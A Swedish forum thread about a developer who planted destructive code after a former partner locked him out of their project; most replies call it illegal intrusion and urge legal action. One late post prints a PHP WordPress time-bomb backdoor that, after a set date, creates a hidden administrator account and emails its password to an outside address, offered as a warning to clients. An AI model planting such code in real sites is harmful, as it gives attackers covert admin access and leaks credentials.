[yakuzaemme]

Citat:

Ursprungligen postat av ConnyWesth

Det du gör är olagligt dataintrång. Det din motpart gör är bara en vanlig tvist om betalning. Det är bättre att hålla på koden tills dn motpart har betalt än att själv begå olagligheter. Skriv ett ordentligt avtal som ger dig rätten till ett fett vite om motparten använder koden utan att betala fullt ut i stället.

Du riskerar fängelse medan motparten bara riskerar lite pengar och en vänskap som den andre tydligen inte värderade särskilt högt.

Själv skulle jag aldrig gå in och förstöra filer för en kund oavsett hur stor tvist det gäller. Möjligen kan jag tänka mig att ha en tidsbestämd körtid innan applikationen slutar att fungera. Men det är en normal funktion som man har i vissa applikationer. Det funkar om man inte ger kunden tillgång till källkoden förrän de betalt för den.

Läs igen så ser du att det inte handlar om någon kund. Jag drev en projekt tillsammans med en sk. vän, när pengar rullade in så stängde han ut mig (böt inlogg till webhotell, ftp, databas m.m) och tog allt mitt arbete. Han var ansvarig för administrativa uppgifter, och jag det tekniska. Om det var en kund så skulle jag givetvis behandlat situationen annorlunda. Avtal fanns inte då jag var ung och dum, inte en susning om att det skulle gå så bra som det gjorde och det faktum att det var en bra vän, blåögd som man är.

[Conny Westh]

Citat:

Ursprungligen postat av yakuzaemme

Läs igen så ser du att det inte handlar om någon kund. Jag drev en projekt tillsammans med en sk. vän, när pengar rullade in så stängde han ut mig (böt inlogg till webhotell, ftp, databas m.m) och tog allt mitt arbete. Han var ansvarig för administrativa uppgifter, och jag det tekniska. Om det var en kund så skulle jag givetvis behandlat situationen annorlunda. Avtal fanns inte då jag var ung och dum, inte en susning om att det skulle gå så bra som det gjorde och det faktum att det var en bra vän, blåögd som man är.

Att förstöra är ändå inte OK, du tar lagen i egna händer i stället för att driva det rättsligt som man ska göra.

Jag vet inte hur ert avtal ser ut så jag kan inte säga exakt vad som ska ske, kanske du ska anmäla honom för stöld, eller dataintrång, vad vet jag. Allt beror på avtal, bolagsform, teckningsrätt och era handlingar mot varandra, det kan vara komplicerat.

Jag tycker det är viktigt att alltid agera fullt legitimt och korrekt även om motparten inte gör det, om du ska ha framgång i en förhandling eller rättsprocess så måste du själv sköta dina kort enligt konstens alla regler, annars förstör du bara för dig själv.

[Hjorten]

Citat:

Ursprungligen postat av ConnyWesth

[...] Jag vet inte hur ert avtal ser ut så jag kan inte säga exakt vad som ska ske, kanske du ska anmäla honom för stöld, eller dataintrång, vad vet jag. Allt beror på avtal, bolagsform, teckningsrätt och era handlingar mot varandra, det kan vara komplicerat.

Citat:

Ursprungligen postat av yakuzaemme

[...] Avtal fanns inte då jag var ung och dum, inte en susning om att det skulle gå så bra som det gjorde och det faktum att det var en bra vän, blåögd som man är.

Min fetmarkering.

[makaflOw]

Går ju att tolka på olika vis. I mina ögon är de oerhört oprofessionellt och om jag var du skulle jag genast byta konsult till en annan.. Känns oerhört oseriöst!

[lubic]

Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

[Nihilnovi]

Jag skulle bryta direkt.

Dock för att han inte vet vad MYSQL update är

[nosnaj]

Citat:

Ursprungligen postat av lubic

Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.

Utan att ha gjort en undersökning tror jag att minst 99% av alla Wordpress-installationer kör md5 eftersom det är standard. Visst kan man modda detta men det känns rätt sällsynt och då får man se till att inget bryts vid framtida uppdateringar av core-filerna.

Bättre lägga energin på att få förändringen av hashfunktionen inbyggt i Wordpress direkt isf.

[lubic]

Missade att detta rörde utveckling i Wordpress.

[altruixm]

När ni köper tid av paranoida WP-utvecklare finns det en metod som liknar vad som TS visade upp, att hålla koll på. Här är ett övertydligt exempel som väntar in att ett datum ska passeras. När datumet passeras skapas en adminanvändare automatiskt och ett mail går ut till "hackaren".

if ( strtotime( "2012-03-15" ) < time() ) {
require_once( ABSPATH . WPINC . '/registration.php' );
if ( !username_exists( 'the-secret-backdoor' ) ) {
add_action( 'shutdown', 'backdoor_create_new_admin' );
function backdoor_create_new_admin() {
$user_id = wp_insert_user( array(
'user_login' => 'the-secret-backdoor',
'user_pass' => 'thesecretpassword1337haxxors',
'user_email' => '[email protected]',
'role' => 'administrator'
) );
wp_mail( '[email protected]', 'New Admin account is ready', 'WP - '.get_bloginfo( 'wpurl' ).' | username: the-secret-backdoor | password: thesecretpassword1337haxxors' );
} } }

Jag kan tänka mig att detta kan maskeras väl med massa includes..

[xciso]

Detta handlar inte om wp utan OpenCart!
Och i grunden handlar det mest om konsulter "får" göra såhär..